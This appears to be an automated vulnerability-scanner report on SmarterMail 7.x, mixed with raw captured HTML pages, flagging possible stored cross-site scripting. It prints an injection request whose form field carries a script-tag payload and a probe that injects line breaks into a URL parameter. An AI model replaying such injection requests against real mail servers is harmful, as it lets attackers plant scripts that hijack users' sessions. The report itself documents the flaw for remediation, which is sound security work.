<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>

<script type="text/javascript">
if (parent.isRoot != null)
parent.location.href = location.href;
if (parent.parent.isRoot != null)
parent.parent.location.href = location.href;
</script>

<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ctl01', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$UpdatePanel2'], [], [], 90);
//]]>
</script>

<div class="CenteredWizard">
<div class="ShadowBox">
<div class="WizardBox">
<div class="WizardTitle">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">
<div class="WizardTitleText">
Change Password
</div>
</div>
</div>
</div>
<div class="RoundedBottom">
<div class="RoundedLeft">
<div class="RoundedRight">
<div class="RoundedBottomLeft">
<div class="RoundedBottomRight">
<div id="ctl00_TipTextDiv" class="WizardTipTextContainer">
<span id="ctl00_UpdatePanel1">

</span>
</div>
<table class="WizardTable">
<tr>
<td class="WizardLeft">
<span id="ctl00_UpdatePanel2">

Welcome to SmarterMail. Your password does not meet the system's requirements for a strong password.<br /><br />To create a strong password you may need to include one or more of the following in your new password: A capital letter, a proper password length, a lower case letter, a numeric character, a symbol, and must not be the same as your username.

</span>
</td>
<td class="WizardRight">
<div class="WizardContent">

<table id="ctl00_MPH_tblPage1" class="SettingsContainer SCMarginTop" border="0">
<tr>
<td id="ctl00_MPH__Label" class="Header" colspan="2">Settings</td>
</tr><tr id="ctl00_MPH_lblUsername">
<td id="ctl00_MPH_lblUsername_Label" class="FixedShort">Username</td><td id="ctl00_MPH_lblUsername_Setting" class="Setting"><span id="ctl00_MPH_lblUsername_ReadOnlyLabel">dummy@hoytllc.com</span></td>
</tr><tr id="ctl00_MPH_txtOldPassword">
<td id="ctl00_MPH_txtOldPassword_Label" class="FixedShort">Old Password</td><td id="ctl00_MPH_txtOldPassword_Setting" class="Setting"><input name="ctl00$MPH$txtOldPassword_SettingText" type="password" id="ctl00_MPH_txtOldPassword_SettingText" class="text" autocomplete="off" /></td>
</tr><tr id="ctl00_MPH_txtNewPassword">
<td id="ctl00_MPH_txtNewPassword_Label" class="FixedShort">New Password</td><td id="ctl00_MPH_txtNewPassword_Setting" class="Setting"><input name="ctl00$MPH$txtNewPassword_SettingText" type="password" id="ctl00_MPH_txtNewPassword_SettingText" class="text" autocomplete="off" /></td>
</tr><tr id="ctl00_MPH_txtConfNewPassword">
<td id="ctl00_MPH_txtConfNewPassword_Label" class="FixedShort">Confirm New Password</td><td id="ctl00_MPH_txtConfNewPassword_Setting" class="Setting"><input name="ctl00$MPH$txtConfNewPassword_SettingText" type="password" id="ctl00_MPH_txtConfNewPassword_SettingText" class="text" autocomplete="off" /></td>
</tr>
</table>

</div>
</td>
</tr>
</table>
<div class="WizardButtons">
<div class="WizardButtonsLeft">

</div>

<div id="ctl00_BrPH_divNormalPage">
<div id="ctl00_BrPH_SaveTextImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BrPH$SaveTextImageButton',''); return false;"><span class="BBInner">Finish</span></a></div>
</div>

</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>


<script type="text/javascript">
//<![CDATA[
UpdateSidebarCounts('UserSync', 0);
$('#ctl00_MPH_txtOldPassword_SettingText').val('1');
$('#ctl00_MPH_txtNewPassword_SettingText').val('1');
$('#ctl00_MPH_txtConfNewPassword_SettingText').val('1');
Sys.Application.initialize();
$(function() { SetTopTitle('Change\x20Password\x20\x2d\x20hoytllc\x2ecom\x20\x2d\x20SmarterMail'); });
modules['vmNotBlank_txt']='Must have a value';
$(function() {$vc({"lt":"Old Password","vcID":"ctl00_MPH_txtOldPassword_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
$(function() {$vc({"lt":"New Password","vcID":"ctl00_MPH_txtNewPassword_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
modules['vmMustMatch_txt']='Must match {0}';
$(function() {$vc({"lt":"Confirm New Password","vcID":"ctl00_MPH_txtConfNewPassword_SettingText","VMs":["vmNotBlank","vmMustMatch"],"VPs":{"vmRequired":true,"vmMustMatch":"New Password","vmMustMatchField":"ctl00_MPH_txtNewPassword_SettingText"}},false);});
//]]>
</script>
</form>
</body>
</html>

[Possible] Permanent Cross-site Scripting

[Possible] Permanent Cross-site Scripting

8 TOTAL
IMPORTANT

Permanent XSS (Cross-site Scripting) allows an attacker to execute dynamic scripts (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly and to steal the user's credentials. This happens because the input entered by the user has been interpreted by HTML/Javascript/VbScript within the browser.

Permanent means that the attack will be stored in the back-end system. In normal XSS attacks an attack needs to e-mail the victim but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' session the attacker might attack an administrator to gain full control over the application.

Impact

Permanent XSS is a dangerous issue that has many exploitation vectors, some of which includes:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /Main/frmSyncMLList.aspx

/Main/frmSyncMLList.aspx

http://vulnerable.smartermail.7.x.host:9998/Main/frmSyncMLList.aspx?tab=%0D%0Ans:+netsparker056650=vuln

Injection URL

http://vulnerable.smartermail.7.x.host:9998/Main/frmPopupAddToOutlook.aspx

Injection Request

POST /Main/frmPopupAddToOutlook.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmPopupAddToOutlook.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Content-Length: 686
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

__EVENTTARGET=ctl00%24BrPH%24btnOK&__EVENTARGUMENT=3&__LASTFOCUS=3&__VIEWSTATE=%2fwEPDwUKLTE0NTYxMzUxOQ8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWBgIFDxYCHgdWaXNpYmxlaGQCBw9kFgJmD2QWAgIBDxYCHwJoFgICAQ8WAh4EVGV4dGVkAgsPZBYCAgEPZBYGAgEPZBYCAgEPZBYCZg8QZA8WAmYCARYCEAUVT3V0bG9vayAyMDA3IG9yIGxhdGVyBQMxLjFnEAUMT3V0bG9vayAyMDAzBQMxLjBnZGQCAg9kFgICAQ9kFgICAg8PFgIfAwUXT3V0bG9vayBTeW5jIENvbm5lY3Rpb25kZAIDD2QWAgIBD2QWAgICDw8WAh8DZWRkZMetqs359%2fzAbUldioYQNOub7SL6&ctl00%24MPH%24lstStsVersion_SettingDropDown=1.1&ctl00%24MPH%24txtDescription_SettingText='%22--%3e%3cscript%3enetsparker(0x0038D2)%3c%2fscript%3e&ctl00%24MPH%24txtStsDisplayName_SettingText=Ronald+Smith

Identification Request

GET /Main/frmSyncMLList.aspx?tab=%0D%0Ans:+netsparker056650=vuln HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmStsSync.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Injection Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 06:31:53 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 3002
Connection: Close


Identification Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 06:53:12 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 312030
Connection: Close




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
Synchronization - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmSyncMLList.aspx?tab=%0d%0ans%3a+netsparker056650%3dvuln" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMjIxNTE5NTQ3DxYGHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UeBF9zR0ZnFgJmD2QWAgIBD2QWBgIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx4HVmlzaWJsZWhkAgYPFgIfBGhkAgcPZBYCZg9kFgICAQ8WAh8EaBYCAgEPFgIeBFRleHRlZBgGBRdjdGwwMCRUUEgkVGFiU3RyaXAkVGFiMw8y2wsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAAC0BBY3RpdmVTeW5jAfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lEBg8AAAAMcHZBY3RpdmVTeW5jC2QFF2N0bDAwJE1QSCRncmRBY3RpdmVTeW5jDwUkVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHxGYWxzZXxGYWxzZXwwZAUTY3RsMDAkTVBIJGdyZFN5bmNNTA8FJFRydWV8VHJ1ZXx8RmFsc2V8VHJ1ZXx8RmFsc2V8RmFsc2V8MGQFGWN0bDAwJE1QSCRncmRBZGRUb091dGxvb2sPBSRUcnVlfFRydWV8fEZhbHNlfFRydWV8fEZhbHNlfEZhbHNlfDBkBRdjdGwwMCRUUEgkVGFiU3RyaXAkVGFiMQ8y0wsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAAB0BTeW5jTUwB9f////z///8GDAAAAAhTZWxlY3RlZAgBAAHz/////P///wYOAAAAClBhZ2VWaWV3SUQGDwAAAAhwdlN5bmNNTAtkBRdjdGwwMCRUUEgkVGFiU3RyaXAkVGFiMg8y3wsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAADUBBZGRUb091dGxvb2sB9f////z///8GDAAAAAhTZWxlY3RlZAgBAAHz/////P///wYOAAAAClBhZ2VWaWV3SUQGDwAAAA5wdkFkZFRvT3V0bG9vawtkNVpa7ObeR3nu63bHyNVuxyu97yk=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&amp;t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>

<script type="text/javascript">
self.EnableAnimations = false;
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UpdatePanel1','tctl00$MPH$UP1','tctl00$MPH$UpdatePanel2'], ['ctl00$BPH$btnDeleteAddToOutlook','ctl00$BPH$btnDeleteSyncML','ctl00$BPH$btnDeleteActiveSync'], [], 90);
//]]>
</script>


<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
Synchronization
</div>
</div>
</div>

<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">

<div id="divSyncML" style="display: none" class="TogglableButtons">
<div id="ctl00_BPH_btnEditSyncML" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_btnEditSyncML(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_btnDeleteSyncML" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_btnDeleteSyncML(); return false;"><span class="BBInner">Delete</span></a></div>
</div>
<div id="divAddToOutlook" style="display:none;" class="TogglableButtons">
<div id="ctl00_BPH_btnEditAddToOutlook" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_btnEditAddToOutlook(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_btnDeleteAddToOutlook" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_btnDeleteAddToOutlook(); return false;"><span class="BBInner">Delete</span></a></div>
</div>
<div id="divActiveSync" style="display: none" class="TogglableButtons">
<div id="ctl00_BPH_btnEditActiveSync" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_btnEditActiveSync(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_btnDeleteActiveSync" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_btnDeleteActiveSync(); return false;"><span class="BBInner">Delete</span></a></div>
</div>

</div>
<div class="ButtonBarRight">

</div>
<div class="ButtonBarClear">
<div class="ie6fix">
&nbsp;</div>
</div>
</div>



<span id="ctl00_UpdatePanel1">

</span>
<div id="ctl00_trTabStrip" class="TabStripContainer">


<!-- HyperTabStrip -->
<div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_TabStrip'>
<li class='htsItem htsFirst htsSelected' id='ctl00_TPH_TabStrip_Tab2'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Add to Outlook</span></span></a></li>
<li class='htsItem ' id='ctl00_TPH_TabStrip_Tab1'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>SyncML</span></span></a></li>
<li class='htsItem htsLast' id='ctl00_TPH_TabStrip_Tab3'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>ActiveSync</span></span></a></li>
</ul>
<input type="hidden" name="ctl00$TPH$TabStrip$SelectedTab" id="ctl00_TPH_TabStrip_SelectedTab" value="ctl00_TPH_TabStrip_Tab2" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>


</div>
<div id="Scrollable" class="ContentDiv">

<span id="ctl00_MPH_HyperContextMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl03' name='ctl00$MPH$ctl03' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl03_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl03_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<span id="ctl00_MPH_HyperContextMenu2">
<!-- HyperMenu -->
